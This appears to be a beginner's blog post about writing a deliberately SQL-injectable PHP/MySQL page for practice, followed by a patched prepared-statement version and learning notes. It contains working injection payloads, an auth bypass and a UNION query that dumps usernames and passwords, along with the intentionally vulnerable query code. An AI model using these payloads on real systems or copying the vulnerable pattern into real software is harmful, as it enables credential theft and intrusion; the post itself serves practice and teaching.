I wrote a front-end verification page. I had forgotten my HTML too, so the page is very sketchy; bear with it, since after all this is the first vulnerability I have ever written myself.
Main interface. I omit the test of whether it has a vulnerability.
Input in the id field: 1' or 1=1#
Skipping the intermediate steps and dumping the data directly:
Input: 1' and 1=2 union select 1,2,group_concat(username,0x3a,password) from user#
Here is my code:
<title>m3tar's first injection</title>
<meta http-equiv="Content-type" content="text/html" charset="Unicode">
<body>
<form action="m-star.php" method="POST">
<table>
<tr>
<td>id</td>
<td><input type="text" name="id"></td>
</tr>
<tr>
<td>User name</td>
<td><input type="text" name="username"></td>
</tr>
<tr>
<td>Password</td>
<td><input type="password" name="password"></td>
</tr>
<tr>
<td><input type="submit" value="Submission"></td>
<td><input type="reset" value="reset"></td>
</tr>
</table>
</form>
</body>
<?php
// Deliberately vulnerable: the posted id is concatenated straight into the SQL string.
if ($_POST) {
    $con = mysql_connect("localhost", "root", "root");
    mysql_select_db("CSM", $con);
    $id = $_POST['id'];
    $sql = "SELECT * from user where id='$id'";
    $query = mysql_query($sql, $con);
    $arr = mysql_fetch_array($query, MYSQL_ASSOC);
    if (!empty($arr)) {
        // Dump the fetched row back to the page
        echo '<pre>', print_r($arr, 1), '</pre>';
    } else {
        echo "Incorrect input";
    }
}
?>
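The handler above with the injection closed, as an added example that is not the author's code. It assumes the page's own setup (database CSM, a user table with id and username columns, the local root/root account) and PHP 7.1 or later with mysqli; find_user is a hypothetical helper name.

```php
<?php
// Added example, not the original page's code. Assumed: database "CSM",
// table "user" with columns id and username, PHP 7.1+ with mysqli.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

// Hypothetical helper: look up one row by id; returns the row or null.
function find_user(mysqli $con, string $rawId): ?array
{
    // Allow-list check: digits only and short enough to fit an int,
    // so input such as 1' or 1=1# is rejected before any SQL runs.
    if (!ctype_digit($rawId) || strlen($rawId) > 9) {
        return null;
    }
    // The id is sent as a bound parameter and is never parsed as SQL text.
    // Only the displayed columns are selected, never the password.
    $stmt = $con->prepare('SELECT id, username FROM user WHERE id = ?');
    $id = (int) $rawId;
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $stmt->bind_result($foundId, $username);
    $row = $stmt->fetch() ? ['id' => $foundId, 'username' => $username] : null;
    $stmt->close();
    return $row;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // A dedicated low-privilege account would be preferable to root.
    $con = new mysqli('localhost', 'root', 'root', 'CSM');
    $con->set_charset('utf8mb4');
    $rawId = $_POST['id'] ?? '';
    // id[]=... arrives as an array; treat anything but a string as invalid.
    $row = is_string($rawId) ? find_user($con, $rawId) : null;
    if ($row !== null) {
        // Escape on output so stored values cannot inject markup.
        echo '<pre>', htmlspecialchars(print_r($row, true), ENT_QUOTES, 'UTF-8'), '</pre>';
    } else {
        echo 'Incorrect input';
    }
    $con->close();
}
```

Both inputs shown earlier fail the digit check, so they produce "Incorrect input" without reaching the database.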
A few things I learned from writing the code:
1) PHP: writing this takes at least a little knowledge of PHP, and some understanding of database programming as well:
Three-tier structure of the database: client, MySQL DBMS, data objects
2) Being able to summarize the steps for operating a MySQL database with the mysql extension library
3) Understanding of phpstudy:
Before, with phpstudy I only knew to drop things into the www directory; I have just learned that it can also switch versions, a very good feature that I hope to use more later. Because I was writing such a simple SQL injection vulnerable page, emmm, it was very uncomfortable: I could not get the database part written, spent half a day on Baidu, and felt very silly. It turned out that phpstudy lets you create a new database (phpMyAdmin, MySQL-Front), so I hurriedly followed what I found on Baidu, copying it step by step. It was the first time I had touched a back-end database of my own, and I was very excited. There are other problems that I have not run into yet; I will add them later.
4) HTML and CSS feel like they were learned for nothing; I have forgotten it all and need to make time to catch up.
5) The respective advantages and disadvantages of POST and GET parameters; for details see http://www.cnblogs.com/hyddd/archive/2009/03/31/1426026.html